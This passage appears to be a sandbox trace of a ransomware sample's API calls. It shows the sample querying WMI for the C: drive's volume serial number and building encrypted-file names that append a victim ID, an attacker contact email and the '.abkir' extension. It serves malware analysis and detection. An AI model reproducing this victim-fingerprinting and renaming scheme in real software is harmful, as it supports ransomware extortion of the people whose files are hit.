pszText=0x0) returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0161.879] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0161.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0161.880] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0161.880] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0161.880] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.880] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0161.880] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0161.880] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0161.880] IUnknown:Release (This=0xb51e34) returned 0x1 [0161.881] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027620) returned 0x0 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027620, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0161.881] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027620, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x60308d0) returned 0x0 [0161.881] WbemDefPath:IUnknown:Release (This=0x6027620) returned 0x0 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x60308d0) returned 0x0 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0161.881] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66ccc08) returned 0x0 [0161.881] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.881] WbemDefPath:IUnknown:Release (This=0x66ccc08) returned 0x3 [0161.881] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0161.881] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0161.881] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0161.881] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0161.881] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0161.881] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0161.881] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x60308d0) returned 0x0 [0161.881] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0161.881] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0161.882] WbemDefPath:IWbemPath:SetText (This=0x60308d0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0161.882] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0161.882] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0161.882] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.882] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0161.882] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0161.882] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0161.882] IUnknown:Release (This=0xb51e34) returned 0x1 [0161.882] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x601f5d0) returned 0x0 [0161.882] WbemLocator:IUnknown:QueryInterface (in: This=0x601f5d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0161.882] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f5d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6027630) returned 0x0 [0161.882] WbemLocator:IUnknown:Release (This=0x601f5d0) returned 0x0 [0161.882] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6027630) returned 0x0 [0161.883] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0161.883] WbemLocator:IUnknown:AddRef (This=0x6027630) returned 0x3 [0161.883] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0161.883] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0161.883] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0162.133] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0162.133] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0162.133] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0162.133] WbemLocator:IUnknown:Release (This=0x6027630) returned 0x2 [0162.133] WbemLocator:IUnknown:Release (This=0x6027630) returned 0x1 [0162.133] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0162.133] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0162.133] WbemLocator:IUnknown:QueryInterface (in: This=0x6027630, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6027630) returned 0x0 [0162.133] WbemLocator:IUnknown:AddRef (This=0x6027630) returned 0x3 [0162.133] WbemLocator:IUnknown:Release (This=0x6027630) returned 0x2 [0162.133] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0162.133] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0162.133] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0162.133] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027580) returned 0x0 [0162.134] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027580, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x6033164) returned 0x0 [0163.491] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5ba94) returned 0x0 [0163.492] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ba94, pProxy=0x6033164, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0163.492] WbemLocator:IUnknown:Release (This=0xb5ba94) returned 0x1 [0163.492] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5bab4) returned 0x0 [0163.492] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5ba94) returned 0x0 [0163.492] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ba94, pProxy=0x6033164, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0163.492] WbemLocator:IUnknown:Release (This=0xb5ba94) returned 0x2 [0163.492] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x1 [0163.492] CoTaskMemFree (pv=0xbd4a08) [0163.492] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x0 [0163.609] WbemLocator:IUnknown:QueryInterface (in: This=0x6033164, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5bab4) returned 0x0 [0163.609] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0163.774] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0163.775] WbemLocator:IUnknown:AddRef (This=0xb5bab4) returned 0x3 [0163.775] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0163.776] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0163.780] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5ba14) returned 0x0 [0163.780] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ba14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0163.780] WbemLocator:IUnknown:Release (This=0xb5ba14) returned 0x3 [0163.780] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0163.780] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0163.780] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5ba9c) returned 0x0 [0163.780] WbemLocator:IRpcOptions:Query (in: This=0xb5ba9c, pPrx=0xb5bab4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0163.780] WbemLocator:IUnknown:Release (This=0xb5ba9c) returned 0x3 [0163.780] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x2 [0163.780] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0163.780] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0163.781] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x6033164) returned 0x0 [0163.781] WbemLocator:IUnknown:AddRef (This=0x6033164) returned 0x4 [0163.781] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x3 [0163.781] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x2 [0163.781] SysStringLen (param_1=0x0) returned 0x0 [0163.781] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0163.781] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0163.781] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0163.781] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0163.781] WbemLocator:IUnknown:AddRef (This=0xb5bab4) returned 0x3 [0163.781] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5bab4) returned 0x0 [0163.781] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x3 [0163.781] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x2 [0163.781] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0163.781] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0163.781] IWbemServices:GetObject (in: This=0x6033164, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x60284b0, ppCallResult=0x0) returned 0x0 [0164.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0164.106] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0164.106] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0164.106] IWbemClassObject:Get (in: This=0x60284b0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36da040*=0, plFlavor=0x36da044*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36da040*=8, plFlavor=0x36da044*=0) returned 0x0 [0164.106] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.106] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.107] IWbemClassObject:Get (in: This=0x60284b0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36da040*=8, plFlavor=0x36da044*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36da040*=8, plFlavor=0x36da044*=0) returned 0x0 [0164.107] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.107] SysStringByteLen (bstr="9C354B42") returned 0x10 [0164.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpFilePart=0x0) returned 0x4d [0164.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x70 [0164.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0164.107] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, 